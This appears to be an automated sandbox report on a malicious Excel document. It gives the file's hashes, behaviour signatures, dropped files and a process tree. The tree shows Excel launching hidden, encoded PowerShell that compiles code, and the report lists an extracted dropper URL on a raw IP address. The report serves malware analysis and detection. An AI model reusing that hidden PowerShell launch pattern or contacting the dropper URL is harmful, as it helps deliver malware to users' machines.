Analysis

  • max time kernel: 33s
  • max time network: 35s
  • platform: windows10-2004_x64
  • resource: win10v2004-20241007-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 13-11-2024 21:52

General

  • Target: 34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1.xls
  • Size: 46KB
  • MD5: d26eae53bd39b5faea126221160286df
  • SHA1: 9b8fcba864831924ab5fcb1c0a7d9d7c0fd2b7d4
  • SHA256: 34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1
  • SHA512: 2efd25b6041942de6e044dbb8ad53418277178abf91a65664cd2bc384f54724951d16b4ceab6e47f80751fc84467a86e6e1d007252a3508ad9ac7bcaccdbb001
  • SSDEEP: 768:r4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:8SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (ps1.dropper): https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process (1 IoC)
    This typically indicates the parent process was compromised via an exploit or macro.
  • Blocklisted process makes network request (1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
    Runs PowerShell with the display window hidden.
  • Checks processor information in registry (2 TTPs, 3 IoCs)
    Processor information is often read in order to detect sandboxing environments.
  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of SetWindowsHookEx (14 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 2040)
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\34e4e229f943419014e699ab59ae5d4bf7b3a99f499ab8ab750bb8cf3a8118f1.xls"
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3524, child of 2040)
      Command line: powershell.exe -nop -w hidden -Enc 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
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1588, child of 3524)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.cmdline"
        • Suspicious use of WriteProcessMemory
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 3016, child of 1588)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\bbguofy5\CSCF022F0707A554A768A12D6D0ED7FEC5A.TMP"


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp
      Filesize: 1KB
      MD5: 2d21d8417094ab97e94c9f60ce27fc7d
      SHA1: 66870f88c40ba0c154b3518c99e6b4298808316d
      SHA256: 5564ec882a334d322e76632e411a30f6a577510b9bfeac8ceaabd7081eb83948
      SHA512: 3e624ee3e7bbef6beab56037e75d1a92960f603a6c471573a67e61c01ba090ef9514250e2d62bdfba9871a7688560019dcf7ef2c2a7489b893a1aead7d5cf143

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsgymzgt.fc1.ps1
      Filesize: 60B
      MD5: d17fe0a3f47be24a6453e9ef58c94641
      SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
      SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
      SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.dll
      Filesize: 3KB
      MD5: 9222ea97a6a4babf39f94c32fa9b723d
      SHA1: fd757ce846b7dcfa2008189a71f0e5398ecee87e
      SHA256: f952e3d89de32eccefefd74061abaa008a6f024ef6ce779e619be81934881903
      SHA512: f57f0e1e9f0ac5c721bbd831a7993d764dfdcae44e51520558ca0100b7a2f044417bf80bc0267c098ef9e24617eb366d9c9b80351bb1d5a57a089a698cb4df6d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
      Filesize: 1KB
      MD5: 3a4acf7da177d06f82f53dbc70c96f08
      SHA1: 39767071696d5e757e6a73cce0beb472eefce10a
      SHA256: 2e7f0882f7a64145e976d3a194e6dd5fd77227c259b43a05360e9d7bc655e4a7
      SHA512: f928887e91e1405f956477fc9c571788dc83aebd97c2cd23c0bab15b9677323e9051da80d9ca29972d450244a103d03c24d6052961946be87531a0f995fcfc71

    • \??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\CSCF022F0707A554A768A12D6D0ED7FEC5A.TMP
      Filesize: 652B
      MD5: d1ff064f91438a38870f318743eac1b9
      SHA1: 50d7576ca1ba37866fad04a01077f8881c2f5a84
      SHA256: aeab426bf320e7dc8a75d8c018f45d71fe94fe497654d980e5468b2d8d47ecd1
      SHA512: ba9480f0d34bc3822a29257a99df00021b7bb0a880b43d74100f09113d55b65521184bd1564cb26122e23fcc90a707dca8be62cc2719652b216adf99027572df

    • \??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.0.cs
      Filesize: 631B
      MD5: f4dd5c682eb7b3b679f084261bfc7c4c
      SHA1: 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
      SHA256: 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
      SHA512: 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\bbguofy5\bbguofy5.cmdline
      Filesize: 369B
      MD5: 5b48498f851129ecf57c2e0faf9011cc
      SHA1: 78687940f626de320832a42035aeb21a69d52239
      SHA256: 664fb67cde2a61f02b3b876240461ccce8ad2c230489a20290e62a34d6d2bfd7
      SHA512: 1f6f5a7a4299f037d00a3d6754c5a1a5f94d1cc43d8dc1dec54e974894b1a25721a28de3b7cfddf8cf8decfe8f48964c1426e220279d177361d70c4b144d8f6e

    Memory dumps (file, size):

    • memory/2040-9-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-33-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-13-0x00007FF9DB5E0000-0x00007FF9DB5F0000-memory.dmp (64KB)
    • memory/2040-0-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp (64KB)
    • memory/2040-7-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-14-0x00007FF9DB5E0000-0x00007FF9DB5F0000-memory.dmp (64KB)
    • memory/2040-16-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-18-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-21-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-20-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-19-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-17-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-23-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-22-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-15-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-6-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-5-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp (64KB)
    • memory/2040-10-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-32-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-12-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-1-0x00007FFA1DA0D000-0x00007FFA1DA0E000-memory.dmp (4KB)
    • memory/2040-11-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-8-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-4-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp (64KB)
    • memory/2040-3-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp (64KB)
    • memory/2040-2-0x00007FF9DD9F0000-0x00007FF9DDA00000-memory.dmp (64KB)
    • memory/2040-72-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-65-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-66-0x00007FFA1DA0D000-0x00007FFA1DA0E000-memory.dmp (4KB)
    • memory/2040-67-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/2040-71-0x00007FFA1D970000-0x00007FFA1DB65000-memory.dmp (2.0MB)
    • memory/3524-61-0x00000248575D0000-0x00000248575D8000-memory.dmp (32KB)
    • memory/3524-45-0x00000248575E0000-0x0000024857602000-memory.dmp (136KB)